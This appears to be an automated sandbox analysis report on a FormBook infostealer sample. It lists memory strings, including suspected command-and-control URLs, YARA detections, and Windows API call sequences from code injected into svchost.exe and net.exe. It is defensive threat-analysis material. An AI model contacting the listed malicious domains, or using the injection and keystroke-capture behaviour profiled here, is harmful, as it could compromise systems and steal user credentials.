                Source: net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/px.js?ch=1
                Source: net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/px.js?ch=2
                Source: net.exe, 00000004.00000002.3873627887.0000000006460000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.yushaliu.online/sk-logabpstatus.php?a=OGs3TzBFWW1ya0l1U1JtY2lBQTZqZElWK1FuVzRYVjB2clVPR0c
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ac.ecosia.org/autocomplete?q=
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
                Source: net.exe, 00000004.00000002.3871744953.000000000523E000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://dts.gnpge.com
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/ac/?q=
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/chrome_newtab
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srf?client_id=00000000480728C5&scope=service::ssl.live.com:
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfclient_id=00000000480728C5&scope=service::ssl.live.com::
                Source: net.exe, 00000004.00000003.1760614588.0000000007E8C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_authorize.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf?lc=1033
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srflc=1033&(
                Source: net.exe, 00000004.00000002.3866320365.0000000002F8D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srf?client_id=00000000480728C5&redirect_uri=https://login.live
                Source: net.exe, 00000004.00000002.3866320365.0000000002FBE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfclient_id=00000000480728C5&redirect_uri=https://login.live.
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=4nk.education
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://whois.gandi.net/en/results?search=astorg-group.info
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.ecosia.org/newtab/
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.00000000048F6000.00000004.80000000.00040000.00000000.sdmp, IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000005262000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.0000000003F66000.00000004.10000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000048D2000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.gandi.net/en/domain
                Source: IislGDEHlLEZDm.exe, 00000003.00000002.3874303163.0000000004A88000.00000004.80000000.00040000.00000000.sdmp, net.exe, 00000004.00000002.3871744953.00000000040F8000.00000004.10000000.00040000.00000000.sdmpString found in binary or memory: https://www.google.com
                Source: net.exe, 00000004.00000003.1765228848.0000000007EAE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00459FFF OpenClipboard,EmptyClipboard,CloseClipboard,GlobalAlloc,GlobalLock,_wcscpy,GlobalUnlock,OpenClipboard,EmptyClipboard,SetClipboardData,CloseClipboard,0_2_00459FFF
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0046C5D0 OpenClipboard,IsClipboardFormatAvailable,IsClipboardFormatAvailable,GetClipboardData,CloseClipboard,0_2_0046C5D0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00456354 GetCursorPos,ScreenToClient,GetAsyncKeyState,GetAsyncKeyState,GetAsyncKeyState,GetWindowLongW,0_2_00456354
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047C08E SendMessageW,DefDlgProcW,GetKeyState,GetKeyState,GetKeyState,SendMessageW,GetKeyState,GetWindowLongW,SendMessageW,SendMessageW,SendMessageW,_wcsncpy,SendMessageW,SendMessageW,SendMessageW,InvalidateRect,SendMessageW,ImageList_SetDragCursorImage,ImageList_BeginDrag,SetCapture,ClientToScreen,ImageList_DragEnter,ReleaseCapture,GetCursorPos,ScreenToClient,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,SendMessageW,GetCursorPos,ScreenToClient,GetParent,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,SendMessageW,SendMessageW,ClientToScreen,TrackPopupMenuEx,GetWindowLongW,0_2_0047C08E

                E-Banking Fraud

                barindex
                Yara detected FormBook
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 2.2.svchost.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000002.00000002.1574269815.0000000000400000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866219592.0000000002E90000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3863689053.0000000002960000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000004.00000002.3866264697.0000000002EE0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1574620078.0000000003A90000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000002.00000002.1575222037.0000000004C00000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000003.00000002.3871219369.00000000031A0000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042CA43 NtClose,2_2_0042CA43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B60 NtClose,LdrInitializeThunk,2_2_03C72B60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DF0 NtQuerySystemInformation,LdrInitializeThunk,2_2_03C72DF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C735C0 NtCreateMutant,LdrInitializeThunk,2_2_03C735C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74340 NtSetContextThread,2_2_03C74340
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C74650 NtSuspendThread,2_2_03C74650
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BE0 NtQueryValueKey,2_2_03C72BE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BF0 NtAllocateVirtualMemory,2_2_03C72BF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72B80 NtQueryInformationFile,2_2_03C72B80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72BA0 NtEnumerateValueKey,2_2_03C72BA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AD0 NtReadFile,2_2_03C72AD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AF0 NtWriteFile,2_2_03C72AF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72AB0 NtWaitForSingleObject,2_2_03C72AB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FE0 NtCreateFile,2_2_03C72FE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F90 NtProtectVirtualMemory,2_2_03C72F90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FA0 NtQuerySection,2_2_03C72FA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72FB0 NtResumeThread,2_2_03C72FB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F60 NtCreateProcessEx,2_2_03C72F60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72F30 NtCreateSection,2_2_03C72F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EE0 NtQueueApcThread,2_2_03C72EE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E80 NtReadVirtualMemory,2_2_03C72E80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72EA0 NtAdjustPrivilegesToken,2_2_03C72EA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72E30 NtWriteVirtualMemory,2_2_03C72E30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DD0 NtDelayExecution,2_2_03C72DD0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72DB0 NtEnumerateKey,2_2_03C72DB0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D00 NtSetInformationFile,2_2_03C72D00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D10 NtMapViewOfSection,2_2_03C72D10
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72D30 NtUnmapViewOfSection,2_2_03C72D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CC0 NtQueryVirtualMemory,2_2_03C72CC0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CF0 NtOpenProcess,2_2_03C72CF0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72CA0 NtQueryInformationToken,2_2_03C72CA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C60 NtCreateKey,2_2_03C72C60
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C70 NtFreeVirtualMemory,2_2_03C72C70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C72C00 NtQueryInformationProcess,2_2_03C72C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73090 NtSetValueKey,2_2_03C73090
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73010 NtOpenDirectoryObject,2_2_03C73010
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C739B0 NtGetContextThread,2_2_03C739B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D70 NtOpenThread,2_2_03C73D70
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C73D10 NtOpenProcessToken,2_2_03C73D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03434340 NtSetContextThread,LdrInitializeThunk,4_2_03434340
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03434650 NtSuspendThread,LdrInitializeThunk,4_2_03434650
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432B60 NtClose,LdrInitializeThunk,4_2_03432B60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432BE0 NtQueryValueKey,LdrInitializeThunk,4_2_03432BE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432BF0 NtAllocateVirtualMemory,LdrInitializeThunk,4_2_03432BF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432BA0 NtEnumerateValueKey,LdrInitializeThunk,4_2_03432BA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432AD0 NtReadFile,LdrInitializeThunk,4_2_03432AD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432AF0 NtWriteFile,LdrInitializeThunk,4_2_03432AF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432F30 NtCreateSection,LdrInitializeThunk,4_2_03432F30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432FE0 NtCreateFile,LdrInitializeThunk,4_2_03432FE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432FB0 NtResumeThread,LdrInitializeThunk,4_2_03432FB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432EE0 NtQueueApcThread,LdrInitializeThunk,4_2_03432EE0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432E80 NtReadVirtualMemory,LdrInitializeThunk,4_2_03432E80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432D10 NtMapViewOfSection,LdrInitializeThunk,4_2_03432D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432D30 NtUnmapViewOfSection,LdrInitializeThunk,4_2_03432D30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432DD0 NtDelayExecution,LdrInitializeThunk,4_2_03432DD0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432DF0 NtQuerySystemInformation,LdrInitializeThunk,4_2_03432DF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432C60 NtCreateKey,LdrInitializeThunk,4_2_03432C60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432C70 NtFreeVirtualMemory,LdrInitializeThunk,4_2_03432C70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432CA0 NtQueryInformationToken,LdrInitializeThunk,4_2_03432CA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034335C0 NtCreateMutant,LdrInitializeThunk,4_2_034335C0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_034339B0 NtGetContextThread,LdrInitializeThunk,4_2_034339B0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432B80 NtQueryInformationFile,4_2_03432B80
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432AB0 NtWaitForSingleObject,4_2_03432AB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432F60 NtCreateProcessEx,4_2_03432F60
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432F90 NtProtectVirtualMemory,4_2_03432F90
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432FA0 NtQuerySection,4_2_03432FA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432E30 NtWriteVirtualMemory,4_2_03432E30
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432EA0 NtAdjustPrivilegesToken,4_2_03432EA0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432D00 NtSetInformationFile,4_2_03432D00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432DB0 NtEnumerateKey,4_2_03432DB0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432C00 NtQueryInformationProcess,4_2_03432C00
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432CC0 NtQueryVirtualMemory,4_2_03432CC0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03432CF0 NtOpenProcess,4_2_03432CF0
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03433010 NtOpenDirectoryObject,4_2_03433010
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03433090 NtSetValueKey,4_2_03433090
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03433D70 NtOpenThread,4_2_03433D70
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_03433D10 NtOpenProcessToken,4_2_03433D10
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02989310 NtCreateFile,4_2_02989310
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02989620 NtClose,4_2_02989620
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02989780 NtAllocateVirtualMemory,4_2_02989780
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02989480 NtReadFile,4_2_02989480
                Source: C:\Windows\SysWOW64\net.exeCode function: 4_2_02989580 NtDeleteFile,4_2_02989580
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00434D50: GetFullPathNameW,__swprintf,_wcslen,_wcslen,_wcslen,CreateDirectoryW,CreateFileW,_memset,_wcslen,_wcsncpy,DeviceIoControl,CloseHandle,RemoveDirectoryW,CloseHandle,0_2_00434D50
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004461ED _memset,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,_wcslen,_wcsncpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_004461ED
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004364AA GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,ExitWindowsEx,InitiateSystemShutdownExW,SetSystemPowerState,SetSystemPowerState,0_2_004364AA
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00409A400_2_00409A40
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004120380_2_00412038
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004271610_2_00427161
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047E1FA0_2_0047E1FA
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004212BE0_2_004212BE
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004433900_2_00443390
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004433910_2_00443391
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0041A46B0_2_0041A46B
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0041240C0_2_0041240C
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004465660_2_00446566
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004045E00_2_004045E0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0041D7500_2_0041D750
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004037E00_2_004037E0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004278590_2_00427859
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_004128180_2_00412818
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0040F8900_2_0040F890
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0042397B0_2_0042397B
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00411B630_2_00411B63
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0047CBF00_2_0047CBF0
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044EBBC0_2_0044EBBC
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00412C380_2_00412C38
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0044ED9A0_2_0044ED9A
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00423EBF0_2_00423EBF
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_00424F700_2_00424F70
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_0041AF0D0_2_0041AF0D
                Source: C:\Users\user\Desktop\XhAQ0Rk63O.exeCode function: 0_2_040E70B00_2_040E70B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00418A032_2_00418A03
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0042F0432_2_0042F043
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004031A02_2_004031A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004012002_2_00401200
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004102C32_2_004102C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C432_2_00416C43
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C282_2_00401C28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00401C302_2_00401C30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00416C3E2_2_00416C3E
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004014D02_2_004014D0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004104E32_2_004104E3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_0040E5632_2_0040E563
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D212_2_00402D21
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_00402D302_2_00402D30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025DC2_2_004025DC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_004025E02_2_004025E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4E3F02_2_03C4E3F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D003E62_2_03D003E6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFA3522_2_03CFA352
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC02C02_2_03CC02C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE02742_2_03CE0274
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF81CC2_2_03CF81CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF41A22_2_03CF41A2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D001AA2_2_03D001AA
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CC81582_2_03CC8158
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C301002_2_03C30100
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDA1182_2_03CDA118
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CD20002_2_03CD2000
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3C7C02_2_03C3C7C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C647502_2_03C64750
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C407702_2_03C40770
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5C6E02_2_03C5C6E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D005912_2_03D00591
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C405352_2_03C40535
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEE4F62_2_03CEE4F6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF24462_2_03CF2446
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE44202_2_03CE4420
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF6BD72_2_03CF6BD7
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFAB402_2_03CFAB40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3EA802_2_03C3EA80
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C429A02_2_03C429A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0A9A62_2_03D0A9A6
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C569622_2_03C56962
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C6E8F02_2_03C6E8F0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C268B82_2_03C268B8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4A8402_2_03C4A840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C428402_2_03C42840
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C32FC82_2_03C32FC8
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4CFE02_2_03C4CFE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CBEFA02_2_03CBEFA0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CB4F402_2_03CB4F40
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C82F282_2_03C82F28
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C60F302_2_03C60F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE2F302_2_03CE2F30
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEEDB2_2_03CFEEDB
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C52E902_2_03C52E90
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFCE932_2_03CFCE93
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40E592_2_03C40E59
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFEE262_2_03CFEE26
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C3ADE02_2_03C3ADE0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C58DBF2_2_03C58DBF
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4AD002_2_03C4AD00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDCD1F2_2_03CDCD1F
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C30CF22_2_03C30CF2
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE0CB52_2_03CE0CB5
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C40C002_2_03C40C00
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C8739A2_2_03C8739A
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2D34C2_2_03C2D34C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF132D2_2_03CF132D
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C5B2C02_2_03C5B2C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CE12ED2_2_03CE12ED
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C452A02_2_03C452A0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C4B1B02_2_03C4B1B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C7516C2_2_03C7516C
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C2F1722_2_03C2F172
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D0B16B2_2_03D0B16B
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CEF0CC2_2_03CEF0CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C470C02_2_03C470C0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF70E92_2_03CF70E9
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF0E02_2_03CFF0E0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CFF7B02_2_03CFF7B0
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CF16CC2_2_03CF16CC
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03C856302_2_03C85630
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03D095C32_2_03D095C3
                Source: C:\Windows\SysWOW64\svchost.exeCode function: 2_2_03CDD5B02_2_03CDD5B0
